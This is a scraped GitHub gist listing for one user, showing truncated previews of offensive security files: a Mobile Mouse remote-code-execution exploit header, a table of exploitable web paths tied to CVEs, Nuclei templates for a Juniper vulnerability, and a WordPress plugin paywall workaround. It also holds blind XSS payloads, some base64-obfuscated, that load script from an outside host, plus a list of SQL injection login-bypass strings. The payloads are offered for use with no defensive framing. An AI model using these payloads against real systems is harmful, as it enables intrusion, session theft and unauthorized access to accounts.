A Pen by Guillaume Chabot on CodePen.
Halim Jabbes hxlxmj
🚩
hxlxmj
/ drag-and-drop-file-to-upload.markdown
Created
December 26, 2024 02:43
Drag-and-Drop File to Upload
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit Title: Mobile Mouse 3.6.0.4 Remote Code Execution | |
| # Date: May 28, 2024 | |
| # Exploit Edited: Halim Jabbes | |
| # Exploit Author: Chokri Hammedi | |
| # Vendor Homepage: https://mobilemouse.com/ | |
| # Software Link: https://www.mobilemouse.com/downloads/setup.exe | |
| # Version: 3.6.0.4 | |
| # Tested on: Microsoft Windows NT 10.0.19045.0 | |
| #!/usr/bin/env python3 |
hxlxmj
/ exploitable_webpaths.md
Created
December 30, 2023 04:12
— forked from kafkaesqu3/exploitable_webpaths.md
easy wins - exploitable/leaky web paths
| Exploit/description | Path |
|---|---|
| Microsoft Office Online Server SSRF (relay) | /op/view.aspx |
| CVE-2017-11317 CVE-2019-18935 | /Telerik.Web.Ui.WebResource.axd?type=rau |
| CVE-2017-11317 CVE-2019-18935 | /Telerik.Web.UI.DialogHandler.aspx |
| CVE-2020-17519 | /jobmanager/logs/ |
| CVE-2017-7615 | /verify.php?id=1&confirm_hash= |
| CVE-2018-1000130 | /jolokia |
| CVE-2018-1000130 | /actuator/jolokia |
| leak | /actuator/env |
hxlxmj
/ subdomain_wordlist.md
Created
November 28, 2023 03:37
— forked from cihanmehmet/subdomain_wordlist.md
Subdomain Wordlist
cmd@fb:/tmp|❯ wc -l 33m-subdomain-wordlist.txt
33927885 33m-subdomain-wordlist.txt
hxlxmj
/ m2sms
Created
November 18, 2023 23:45
— forked from spangey/m2sms
Email to SMS gateways in YAML
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| config: | |
| from_address: [email protected] | |
| carriers: | |
| alltel: | |
| name: Alltel | |
| value: @message.alltel.com | |
| ameritech: | |
| name: Ameritech | |
| value: @paging.acswireless.com |
hxlxmj
/ allinonemigration.md
Created
October 3, 2023 10:23
— forked from giovanni-d/allinonemigration.md
All-in-One WP Migration - Restore From Server (without PRO version) - Restore
If you don't want to pay for the PRO version of this plugin, and you want to use the "Restore from Server" functionally that was present in the version 6.77, follow the instructions below:
- Open the js file: wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js
- On line 1208, replace the code below:
$('.ai1wm-backup-restore').click(function (e) {
hxlxmj
/ CVE-2023-36845.yaml
Created
September 20, 2023 04:15
Nuclei Template For Juniper Networks Junos OS PHP External Variable Modification Vulnerability
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: CVE-2023-36845 | |
| info: | |
| name: Juniper Networks Junos OS PHP External Variable Modification Vulnerability | |
| author: hxlxmj | |
| severity: medium | |
| description: | | |
| A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables. | |
| reference: | |
| - https://nvd.nist.gov/vuln/detail/CVE-2023-36845 |
hxlxmj
/ CVE-2023-36845.yaml
Created
September 19, 2023 20:58
Vulnerability Scanner for Juniper CVE-2023-36845
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: CVE-2023-36845 | |
| info: | |
| name: Juniper Networks Junos OS PHP External Variable Modification Vulnerability | |
| author: hxlxmj | |
| severity: medium | |
| description: | | |
| A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables. | |
| reference: | |
| - https://nvd.nist.gov/vuln/detail/CVE-2023-36845 |
hxlxmj
/ xss_payloads.txt
Created
September 12, 2023 17:37
— forked from nullenc0de/xss_payloads.txt
XSS_Payloads
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "><script src="https://js.rip/t9eoip8zws"></script> | |
| javascript:eval('var a=document.createElement(\'script\');a.src=\'https://js.rip/t9eoip8zws\';document.body.appendChild(a)') | |
| "><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL3Q5ZW9pcDh6d3MiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus> | |
| "><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL3Q5ZW9pcDh6d3MiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))> | |
| "><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL3Q5ZW9pcDh6d3MiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7> | |
| "><iframe srcdoc="<script>var a=parent.document.createElement("scr&# |
hxlxmj
/ sqli-auth-bypass.txt
Created
September 8, 2023 00:35
— forked from spenkk/sqli-auth-bypass.txt
SQL Injection Authentication Bypass payloads
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| or 1=1 | |
| or 1=1-- | |
| or 1=1# | |
| or 1=1/* | |
| admin' -- | |
| admin' # | |
| admin'/* | |
| admin' or '1'='1 | |
| admin' or '1'='1'-- | |
| admin' or '1'='1'# |
NewerOlder